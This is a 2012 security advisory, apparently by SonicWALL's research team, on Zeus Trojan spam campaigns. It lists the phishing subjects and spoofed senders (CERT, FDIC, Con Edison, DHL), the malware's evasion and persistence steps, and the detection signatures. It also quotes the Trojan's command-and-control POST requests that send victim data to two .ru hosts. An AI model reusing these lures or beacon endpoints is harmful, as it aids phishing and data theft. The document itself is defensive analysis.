Zeus spam campaigns continue - Year 2012

January 13, 2012

SonicWALL UTM Research team observed reports of multiple spam campaigns involving new variants of the Zeus Trojan. The most recent campaign involved emails pretending to be from US Department of Homeland Security's CERT division, warning the user of a Phishing incident and contains a zipped attachment. The zipped attachment in the email is a newer variant of the Zeus Trojan.

Below is a sample of e-mail subjects and targeted organizations seen in these spam campaigns in the past week:

  • Phishing incident report call number: PH000000(Random Number)
    Spoofed: US Government- Computer Emergency Readiness Team
  • FDIC: About your business account (12 digit Alphanumeric)
    Spoofed: US Government- Federal Deposit Insurance Corporation
  • Your Billing Summary as of (DATE)
    Spoofed: Con Edison Inc.
  • DHL Parcel Tracking Notification (Random Number)
    Spoofed: DHL Courier service

SonicWALL Research team has received more than ten unique payloads in the past week from these campaigns. Zeus binaries found in the zipped attachments from these campaigns looks like:


Upon execution, it performs following activities:

  • Checks if it is running in a virtual environment (VBOX, VMware, Virtual PC) and contains anti-debugging code to thwart analysis.
  • Drops the following files on the system and runs it:

    • (Application Data)feahulbofuiv.exe [Detected as GAV: Zbot.YW_163 (Trojan)]
    • (Temp)tmp242dfb15.bat [Deletes the original file and deletes itself]
  • Creates registry entry to ensure that the dropped file runs on system reboot.
  • Connects to a remote C&C server based in China and sends victim machine's information:
     			POST /stone2012.php HTTP/1.1 			Host: plantlunch.ru 			..... 			bn1=XXXX&sk1=XXXXX 		 			POST /jinjer.php HTTP/1.1 			Host: viperheart.ru 		

SonicWALL Gateway AntiVirus provides proactive protection against these spam campaign via following signature:

  • GAV: Zbot.YMH (Trojan)
  • GAV: Zbot.YW_163 (Trojan)